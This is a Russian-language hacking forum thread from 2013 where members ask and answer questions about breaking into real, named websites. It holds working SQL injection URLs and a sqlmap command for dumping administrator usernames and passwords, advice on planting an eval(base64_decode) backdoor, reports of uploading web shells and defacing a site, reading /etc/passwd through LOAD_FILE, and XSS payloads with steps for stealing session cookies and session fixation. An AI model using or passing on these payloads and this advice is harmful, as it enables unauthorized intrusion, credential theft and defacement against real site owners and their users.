Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Такая кавычка тоже режится ?
    Как насчет
    или
    ?
     
  2. HeaVeNSeR

    HeaVeNSeR Member

    Joined:
    3 Dec 2008
    Messages:
    176
    Likes Received:
    11
    Reputations:
    1
    такая кавычка не режется, print(`ls -la`) сработало...но теперь похоже режутся слэши...ни ls ../,ни ls ..\ не срабатывает...соотв-но,залиться тоже не получается...
    есть ещё варианты? :rolleyes:
     
  3. Zahar

    Zahar Banned

    Joined:
    17 Mar 2008
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    help

    Парни, хелп!
    Code:
    _ttp://www.infotopcar.com/index.php?option=com_parcoauto&action=scheda&idVeicolo=-3473%20UNION%20ALL%20SELECT%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,CONCAT%280x7e,version%28%29,0x7e%29,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--%20&tipo=auto
    Не получается продвинуть далее.
     
  4. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Code:
    www.infotopcar.com/index.php?option=com_parcoauto&action=scheda&idVeicolo=-3473 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,table_name,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,  86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156+from+information_schema.tables+where+table_schema=0x706f7274616c636c7562+limit+0,1--+-&tipo=auto
     
  5. Boombilka

    Boombilka New Member

    Joined:
    16 Feb 2013
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    Есть булковский форум, прописал в faq_complite eval($_GET[e]);.
    Вроде бы все хорошо, пхп инфо выводиться, но вот только:
    Code:
    allow_url_include Off
    allow_url_fopen   Off
    
    
    
    Интересует, как заливаться в данной непростой ситуации? До этого пробывал вгетом лить в tmp, вроде бы все залилось, только вот site.com/tmp/shell.php не открывается, и выдает 404 ошибку. И да, на всех папках стоят права nobody(мб это как-то влияет?).
    Заранее спасибо
     
  6. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    пропиши eval(base64_decode($_GET[e]));
    и юзай курл
     
  7. exstreme

    exstreme New Member

    Joined:
    23 Feb 2013
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Привет всем!
    Помогите пожалуйста разобраться с XSS-уязвимостями. Не совсем понятно, как использовать их, чтобы к примеру получить чужие cookies, а не свои.
    Что делать с такого вида уязвимостями?
    Code:
    URL encoded POST input poll%5Btitle%5D was set to '"()&%1<ScRiPt >prompt(911011)</ScRiPt>
    
    или
    Code:
    URL encoded POST input character%5bdescription%5d was set to 1<div style=width:expression(prompt(928982))>
    The input is reflected inside a text element.
    
    Также интересует уязвимости типа "HTML form without CSRF protection" можно использовать для подмены данных или не только?
     
  8. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Сообственно впервые столкнулся с такой проблемой)
    Вообщем через скуль добыл пасс от рута мускула , на сайте есть phpmyadmin
    Сообственно пытался залить шелл через пхпмуадмин и столкнулся с такой проблемой
    а именно с определение пути к сайту
    например мой сайт называется sqlinject.com
    sqlinject.com/news.php?id=1'
    Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/vhost/sql.com/news.php on line 63
    так же в корне присувствует файл phpinfo в котором путь так же прописан таким образом /var/www/vhost/sql.com/phpinfo.php
    Решил посмотреть сайты на одном ип в итоге получил список из 50+ сайтов... попробовал просканить эти сайты на директории и файлы оказалось что в каждом сайте присувствуют такие файлы config.php, connect.php, phpinfo.php и еще куча файлов. вообщем файлы одни и теже на каждом сайте... это я клоню к тому что файлы эти посути лежат в одной директории, но контент на сайтах разный совершенно...
    в файле phpinfo.php на каждом сайте один и тот же путь) "/var/www/vhost/sql.com/phpinfo.php"
    Пробовал прочитать файл через LOAD_FILE например phpinfo с пути написанного выше) не читает... хотя /etc/passwd читает)
    Чисто для читалки попробовал залить минишелл через пхпмуадмин в /tmp/
    Шелл залился и прочитался через LOAD_FILE
    Сообственно интересует вопрос возможно ли как-то получить настоящий путь к сайту sqlinject.com, что бы залится)
    Мб есть у кого какие нить соображения по этому поводу?)
    Есть папочка icons от апача) но она походу не доступна для записи) да и путь искать надо)
    Если есть у кого желание помочь и поломать голову)) могу предоставить root;pass к phpmyadmin ))
     
  9. jestkokos

    jestkokos New Member

    Joined:
    7 Mar 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    http://bkwar.ru/news/?topic=494 Протестил через Хавиж (ну первонюбские примычки) Скюля методом стринг. Хавиж выводит Бд всё нормально таблицы и так далее...
    Ихнее http://bkwar.ru/www/labirint3/ulldie.php Пхпинфо
    ИСП мэнэджер тут https://bkwar.ru:1500/
    Ещё БД тут http://bkwar.ru/pgadmin/
    Открытые порты сканеные через нмап : 110 , 143, 1500 , 21 ,22 , 443 , 4444 ,5000 ,53 , 993 ,995 ну и соотвественно 80.
    Что нашёл webshag Напишу более подозрительные
    /robots.txt found. It might be interesting to have a look inside.
    /bin/ Directory indexing is enabled: CGI directory
    /bin/ This might be interesting... possibly a system shell found.
    /webmail/src/read_body.php This might be interesting... has been seen in web logs from an unknown scanner.
    Ну есть ещё уйма директорий ...
    А да сканер Дирбустер показал это : http://bkwar.ru/myadmin/setup/index.php
    Пробовал разные варианты прочитанные и не прочитанные. А у них отключенно выползание ерророк (тут и ступор).
    Недельки две мучаюсь. может подскажите как как всё это преодолеть и вынести результат в браузер.


    Прошу прощение если не туда всунул вопрос. Ещё не освоился у вас...
     
    #21949 jestkokos, 12 Mar 2013
    Last edited: 12 Mar 2013
  10. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    нужно вывести username,password при помощи sqlmap, где usertype=Administrator

    http://blindcanadians.ca/press_releases/index.php?BriefID=50+union+select+concat_ws(0x3a,username,password)+from+users+where+usertype='Administratot'+--+

    так дампится вся база, как сделать так, чтобы выводился только Administrator?

    sqlmap -u "http://blindcanadians.ca/press_releases/index.php?BriefID=50" --dump -T users -v 1
     
  11. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    я тут с такой поблемой столкнулся, залил на сайт шелл, отредактировал морду, открываю сам сайт, изменений ноль, смотр на Server IP: там написано 127.0.0.1 что ет за фигня такая?
     
  12. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    посмотри с другово браузера этот же сайт, или просто очисти кеш
     
  13. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    та это тут не причём, индекс действительно не изменился, вот если удалить файл то да, напишет ошибку, а от изменений ноль толку
     
  14. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    И чего удивительного? Наверняка какой нибудь APC cache или что-то из этой оперы стоит. При изменении кеш просто не успевает обновиться, а при удалении файловый идентификатор из ФС исчезает и в opcode кешер вносится соответствующая информация. Посмотри что используется в phpinfo и если тот же APC то у него есть менеджер одним файлом в котором удобно обнулять кеш.

    По поводу IP учите матбазу господа. В стандартной связке nginx+apache, к примеру, фронтэнд вешается на внешний интерфейс имеющий уникальный IP, в то время как бэкэнд вешается на локальный те localhost он же 127.0.0.1. А так как php выполняется на уровне бэкэнда будь то mod_php или cgi, то и переменная окружения которая выводится в serverIP имеет оный localhost
     
    #21954 Cennarios, 12 Mar 2013
    Last edited: 12 Mar 2013
  15. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75

    чего ты так рагорячился)) мы же не такие про как ты))
    глянул пхп инфо, есть там apc, как там обнулить кеш?
     
  16. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    погугли - apc.php manager по самому первому линку там можно скачать скрипт. Очень просто настраивается. В правом верхнем углу кнопка - clear opcode cache. Меняешь php файл. Обнуляешь кеш, заново инициируешь запуск файла в который были внесены изменения. Стоит отметить, что далее в frontend-backend данные от бэкенда попадают в тот же файловый кеш нгинкса или мемкеш. Так что если все равно не обновится значит копать в эту сторону.
     
    1 person likes this.
  17. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    183
    Likes Received:
    22
    Reputations:
    2
    Как пользоваться PHPSESSID session fixation дайте ссылку на топ
     
  18. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Возможный путь использования XSS:
    PHP:
    Нахождение XSS
    Впаривание XSS
    Получение PHPSESSID
    Заход под PHPSESSID
    PHPSESSID session fixation:
    PHP:
    Создание своего уже-известного PHPSESSID
    Установка этого PHPSESSID у удаленого человека(Впаривание)
    Он авторизуется по этим PHPSESSID
    Мы заходим под уже известным PHPSESSID
    Может использоваться как альтернатива кражи куков в некоторых случаях, при впаривани методом соц. инженерии, при отправке скомпрометированного ответа сервером.

    Установка PHPSESSID может быть в параметрах методом GET, а не только через куки.


    http://www.acros.si/papers/session_fixation.pdf
     
    #21958 randman, 13 Mar 2013
    Last edited: 13 Mar 2013
  19. panfilov1991

    panfilov1991 New Member

    Joined:
    22 Jan 2013
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    отправляю запрос на сервер
    Выдает :
    Сайт
     
  20. panfilov1991

    panfilov1991 New Member

    Joined:
    22 Jan 2013
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Нужно вывести лог и пасс админа
     
Thread Status:
Not open for further replies.